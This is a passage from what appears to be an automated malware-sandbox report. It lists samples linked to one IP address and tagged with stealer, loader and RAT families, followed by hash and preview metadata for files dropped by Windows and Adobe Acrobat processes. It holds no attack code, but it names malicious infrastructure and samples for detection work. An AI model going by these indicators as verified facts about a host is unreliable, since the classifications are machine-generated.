                                                                                            • 62.182.21.105
                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 62.182.21.105
                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 62.182.21.105
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                            • 62.182.21.105
                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                            • 62.182.21.105
                                                                                            c2.htaGet hashmaliciousXWormBrowse
                                                                                            • 62.182.21.105
                                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                                            • 62.182.21.105
                                                                                            Setup.msiGet hashmaliciousVidarBrowse
                                                                                            • 62.182.21.105
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                            • 62.182.21.105
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                            • 62.182.21.105
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\user\AppData\Roaming\UltraChrome\msvcr90.dllupgrade.htaGet hashmaliciousDarkVision RatBrowse
                                                                                              file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                bUAmCazc.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                  KBKHHYI29L.msiGet hashmaliciousAmadeyBrowse
                                                                                                    http://winningwriters.comGet hashmaliciousUnknownBrowse
                                                                                                      evhopi.ps1Get hashmaliciousLummaCBrowse
                                                                                                        9nobq4rqr0.exeGet hashmaliciousUnknownBrowse
                                                                                                          Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                                                            tera10.zipGet hashmaliciousUnknownBrowse
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):1.307374939990025
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrQ:KooCEYhgYEL0In
                                                                                                              MD5:BA5EDD24C54EADA7E88562B5260B31BC
                                                                                                              SHA1:5E00E87351BE51E2DDCBD7A977DDB39A4E780917
                                                                                                              SHA-256:9D6E6D5181BE73DB25FBDDA6362722EC99AA6C47C83358295348A14F5FBFD2CE
                                                                                                              SHA-512:DA74BFE74107E8520EBAE4FBCDE8026F694F4CBCA5CACE62531C4E52559838C9386C8B7FC5CC2606BC77BCA1072A9B5BA43F8C696AB749E88677DC08C129E709
                                                                                                              Malicious:false
                                                                                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7d1cdfbf, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.422207335179173
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                                                              MD5:26F93DA6AC6DA617BD9B622F4EA1AAC3
                                                                                                              SHA1:D40B3B3AC6373404251162C6D10A6D0EF6F8AC69
                                                                                                              SHA-256:98B0C0634840D0BF133B9805D5DE4C961C968A58F0D7ED09469F279F0069BCD6
                                                                                                              SHA-512:EC6430AB6AF2D0EFF83D8FC5FFFE5BAB2BEAD0ED3381A75ECED4183F25C18BF23D875B6DD47A99F6AC790103FDB779485D321E3DC78754216F5D87C0DE20D90C
                                                                                                              Malicious:false
                                                                                                              Preview:}..... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................L.....|...........................|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16384
                                                                                                              Entropy (8bit):0.07660416236845699
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:WVmll8YeZaau5ejjn13a/R3O/lillcVO/lnlZMxZNQl:Pl8zZalAj53qhO/IOewk
                                                                                                              MD5:CF41D4A843629EF13561BFB56C19FF3A
                                                                                                              SHA1:8095B3BA7055D9AAFEB6EB6DDA7F8BBF947EBEA1
                                                                                                              SHA-256:CEA9A4DF744078081C2C7E26782A82F81CD6A410715EA223E253B90884E5CE8A
                                                                                                              SHA-512:599AFB9CB6ACC13EEAFD41B03BCEB277E8D9C0199221ECD04F99FF38154C2128618EC1F52D7BF6176EE9E972D8AEBBE0657ABD237815C52A3432C72488405A57
                                                                                                              Malicious:false
                                                                                                              Preview:.A.......................................;...{.......|.......{A..............{A......{A..........{A].........................|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):292
                                                                                                              Entropy (8bit):5.242171722515544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fATAN4q2Pwkn2nKuAl9OmbnIFUt8OfAzJZmw+OfAzDkwOwkn2nKuAl9OmbjLJ:7ey4vYfHAahFUt8OwJ/+OwD5JfHAaSJ
                                                                                                              MD5:F2612615719D3F9F469600ABFCDD4A50
                                                                                                              SHA1:1365819537726AF1808DB9BD11F5B2E4A0239FEE
                                                                                                              SHA-256:ED5468D3FCA696ACC0A4A78BF9B098359C6FF36F3770960B7137AE018158A374
                                                                                                              SHA-512:4750F10E18B5F9BDCD23E46AB566B297CB6E9D5A95A3F27DB5DBC7A621DC92C13F30B5141441C549E9FCD0C114D77B9D995BA27AA684CC72B1432AC566ECE649
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/16-03:14:17.806 1d64 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/16-03:14:17.809 1d64 Recovering log #3.2024/12/16-03:14:17.809 1d64 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):292
                                                                                                              Entropy (8bit):5.242171722515544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fATAN4q2Pwkn2nKuAl9OmbnIFUt8OfAzJZmw+OfAzDkwOwkn2nKuAl9OmbjLJ:7ey4vYfHAahFUt8OwJ/+OwD5JfHAaSJ
                                                                                                              MD5:F2612615719D3F9F469600ABFCDD4A50
                                                                                                              SHA1:1365819537726AF1808DB9BD11F5B2E4A0239FEE
                                                                                                              SHA-256:ED5468D3FCA696ACC0A4A78BF9B098359C6FF36F3770960B7137AE018158A374
                                                                                                              SHA-512:4750F10E18B5F9BDCD23E46AB566B297CB6E9D5A95A3F27DB5DBC7A621DC92C13F30B5141441C549E9FCD0C114D77B9D995BA27AA684CC72B1432AC566ECE649
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/16-03:14:17.806 1d64 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/16-03:14:17.809 1d64 Recovering log #3.2024/12/16-03:14:17.809 1d64 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):336
                                                                                                              Entropy (8bit):5.193898179571109
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fIVFUnVq2Pwkn2nKuAl9Ombzo2jMGIFUt8OfI1gZmw+OfIXFIIkwOwkn2nKuAlx:7AQvYfHAa8uFUt8O9/+OiN5JfHAa8RJ
                                                                                                              MD5:059432123D68F4ED74D386A801F1F172
                                                                                                              SHA1:1FC8D17B269F55EB99DF87231822AE28E36D1CCF
                                                                                                              SHA-256:05E03CE1974D42474F215D03BFAE05B0242283534BC1923FDDBD45330353639C
                                                                                                              SHA-512:CA386BE5C4D64B04DABC3996BFD52B183A06F9A28B0988EE4FB7C9F5685775FCACDF1F317D536AEDC407846F6811D40FE0F01F1D8CDB9CCB239C454DE45B8005
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/16-03:14:17.880 1dc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/16-03:14:17.881 1dc4 Recovering log #3.2024/12/16-03:14:17.882 1dc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):336
                                                                                                              Entropy (8bit):5.193898179571109
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fIVFUnVq2Pwkn2nKuAl9Ombzo2jMGIFUt8OfI1gZmw+OfIXFIIkwOwkn2nKuAlx:7AQvYfHAa8uFUt8O9/+OiN5JfHAa8RJ
                                                                                                              MD5:059432123D68F4ED74D386A801F1F172
                                                                                                              SHA1:1FC8D17B269F55EB99DF87231822AE28E36D1CCF
                                                                                                              SHA-256:05E03CE1974D42474F215D03BFAE05B0242283534BC1923FDDBD45330353639C
                                                                                                              SHA-512:CA386BE5C4D64B04DABC3996BFD52B183A06F9A28B0988EE4FB7C9F5685775FCACDF1F317D536AEDC407846F6811D40FE0F01F1D8CDB9CCB239C454DE45B8005
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/16-03:14:17.880 1dc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/16-03:14:17.881 1dc4 Recovering log #3.2024/12/16-03:14:17.882 1dc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):475
                                                                                                              Entropy (8bit):4.967403857886107
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                                                              MD5:B7761633048D74E3C02F61AD04E00147
                                                                                                              SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                                                              SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                                                              SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                                                              Malicious:false
                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:modified
                                                                                                              Size (bytes):475
                                                                                                              Entropy (8bit):4.967403857886107
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:YH/um3RA8sq2J2sBdOg2Hqcaq3QYiubInP7E4TX:Y2sRdsRdMHF3QYhbG7n7
                                                                                                              MD5:1A9602AEF82211184C6F7A97B7A4DD59
                                                                                                              SHA1:43934F011A32BB5EBE9011F024242AB8DE4E91B3
                                                                                                              SHA-256:90BA6F883294453BCA8E2A83527EB1D1900DA018AC171FAFFA32E61676A1EA03
                                                                                                              SHA-512:14F33274D656657341A084EC8375F9ED32A0DA59FA3632F37CE902E3649856CFB40F6FBA05CE44BA481B4FD62F1D1702F7672B6B3651463C41F0DA56BD274BCF
                                                                                                              Malicious:false
                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378896870036329","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":643931},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):475
                                                                                                              Entropy (8bit):4.967403857886107
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                                                              MD5:B7761633048D74E3C02F61AD04E00147
                                                                                                              SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                                                              SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                                                              SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                                                              Malicious:false
                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):475
                                                                                                              Entropy (8bit):4.967403857886107
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                                                              MD5:B7761633048D74E3C02F61AD04E00147
                                                                                                              SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                                                              SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                                                              SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                                                              Malicious:false
                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4320
                                                                                                              Entropy (8bit):5.257796598422867
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7SacFHYo:etJCV4FiN/jTN/2r8Mta02fEhgO73goM
                                                                                                              MD5:3E4E7E2EE6412F80F2C9DB77BF4CE7A4
                                                                                                              SHA1:F3795CB37D7ACD10B3B093BC9E0872CA3C9B5BA6
                                                                                                              SHA-256:8C6C5B2F83281D2722C4C3DBE96AAD8A4D216E830AA4B55362D4FD9E86DA72C8
                                                                                                              SHA-512:403AEE99A54C235919B8C8B6DB8D804C214FD4F4FAA8358E289E4DEE7B9972786C40DC9B85452A2D546CBFEE32070FBE3AF649D29B47C3840CC363D3FB13DF27
                                                                                                              Malicious:false
                                                                                                              Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):324
                                                                                                              Entropy (8bit):5.162375983483245
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fGw0Vq2Pwkn2nKuAl9OmbzNMxIFUt8OfogZmw+OfoIkwOwkn2nKuAl9OmbzNMFd:7JMvYfHAa8jFUt8O5/+OT5JfHAa84J
                                                                                                              MD5:8F08DF12F67F31507A7017098EAEC8A8
                                                                                                              SHA1:86D9F5D5B785F2AE25920DFE8BBB83151E8D6E12
                                                                                                              SHA-256:68D23BEB8723BB4A5163F37D899D1088BC82A6338D6A58C4334253AAB3C3EA02
                                                                                                              SHA-512:CBC056C776C2C19154F7BFFFBF9B0D1B4E4CAFCEBAF591D4850F90A98F7363E6B98281373CFCF86A5FD8599B354F711BDF4158FFBD70C3F5815EE28DBFCA1D00
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/16-03:14:18.026 1dc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/16-03:14:18.042 1dc4 Recovering log #3.2024/12/16-03:14:18.042 1dc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):324
                                                                                                              Entropy (8bit):5.162375983483245
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fGw0Vq2Pwkn2nKuAl9OmbzNMxIFUt8OfogZmw+OfoIkwOwkn2nKuAl9OmbzNMFd:7JMvYfHAa8jFUt8O5/+OT5JfHAa84J
                                                                                                              MD5:8F08DF12F67F31507A7017098EAEC8A8
                                                                                                              SHA1:86D9F5D5B785F2AE25920DFE8BBB83151E8D6E12
                                                                                                              SHA-256:68D23BEB8723BB4A5163F37D899D1088BC82A6338D6A58C4334253AAB3C3EA02
                                                                                                              SHA-512:CBC056C776C2C19154F7BFFFBF9B0D1B4E4CAFCEBAF591D4850F90A98F7363E6B98281373CFCF86A5FD8599B354F711BDF4158FFBD70C3F5815EE28DBFCA1D00
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/16-03:14:18.026 1dc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/16-03:14:18.042 1dc4 Recovering log #3.2024/12/16-03:14:18.042 1dc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65110
                                                                                                              Entropy (8bit):1.5660255405159125
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:CqiWecVTs1o+o6DX7B8wOCknAhhhMCc8opQChqlohhhhhhhhhhhhhhhhxhhjhhhw:CqiWecVg1o+fDX7rknAhhhMCzo5hqlV
                                                                                                              MD5:B34ACB9DC146C155645C4C9A83E5E364
                                                                                                              SHA1:B14949991256F63C163946B479BB9BD511536472
                                                                                                              SHA-256:840AD703F8094E492DDC8601B3FE979888A767C6FEF10B311F1DACCD7957C531
                                                                                                              SHA-512:F14C81FC286431BB870A142B6D4652BA617742D965BCE96A7E455C67978C0FE3D5DFD21C660F5B276FA3390D5977A4DC5E2170CBB1B991AAC45737E326291CFF
                                                                                                              Malicious:false
                                                                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                              Category:dropped
                                                                                                              Size (bytes):86016
                                                                                                              Entropy (8bit):4.445125131330948
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:yezci5t4iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rfs3OazzU89UTTgUL
                                                                                                              MD5:D08F7154D576A630AE951990B2BFF846
                                                                                                              SHA1:C1BFAF9ED383E501B1001F1E3E7D9949522230D5
                                                                                                              SHA-256:8BD275F6D390FE8DC864554877DAC4457927214C94DBF037FBC85D8103465A93
                                                                                                              SHA-512:4441267BCFBD115F6F04D6ADED94962C36D1E001174FB54645FB31F38EDC3BEEFA159B358694C802A81873C59C62B8F7FCF9110229E5F807DE616BD2F1494428
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:SQLite Rollback Journal
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8720
                                                                                                              Entropy (8bit):3.777431808330045
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:7MOup/E2ioyVqioy9oWoy1Cwoy1GKOioy1noy1AYoy1Wioy1hioybioyMoy1noyl:7FupjuqF5XKQ1fb9IVXEBodRBk3
                                                                                                              MD5:1F00E5254221DB9B6D159D3B7A97B7B8
                                                                                                              SHA1:1741FC42BCA4260C3B7D6EBBDD9D3FFE31D34DE2
                                                                                                              SHA-256:9DC64C9948373DE5DF802787E76DE210EF1C78ED4D49B72DFCCC4797E4E0B627
                                                                                                              SHA-512:C3D1E232FB18951FF95A38025BB96D7D29DB65D802DFF0B789417D91DB3AF549A4BEBB12487D257C6EF43D5FA0A7CE10E1ED9921A2E0E275AC47F1E0B7EFDA92
                                                                                                              Malicious:false
                                                                                                              Preview:.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:Certificate, Version=3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1391
                                                                                                              Entropy (8bit):7.705940075877404
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                              Malicious:false
                                                                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):192
                                                                                                              Entropy (8bit):2.7464849065063075
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:kkFklnHM1kVXfllXlE/HT8k7svNNX8RolJuRdxLlGB9lQRYwpDdt:kK319T8ycNMa8RdWBwRd
                                                                                                              MD5:8E41CBDB5521F3921860F76DEAD5D6FC
                                                                                                              SHA1:6AA8CB127FFEAD6F53CEF9997E13C9C69FAFBD48
                                                                                                              SHA-256:F7B8C2C64A69069E59EB6F2FA80695F82B8FDE2E59456EAA25E1190ABF5A98F1
                                                                                                              SHA-512:1444908DFA4C9B7C10371868E2338B3D72625F8F00634C8A20F784A454955DD0CFB89B1440CAA75856C53DB1A9A8C995F75820DC102FF234293401396D114A43
                                                                                                              Malicious:false
                                                                                                              Preview:p...... .........bb..O..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:PostScript document text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1233
                                                                                                              Entropy (8bit):5.233980037532449
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                              Malicious:false
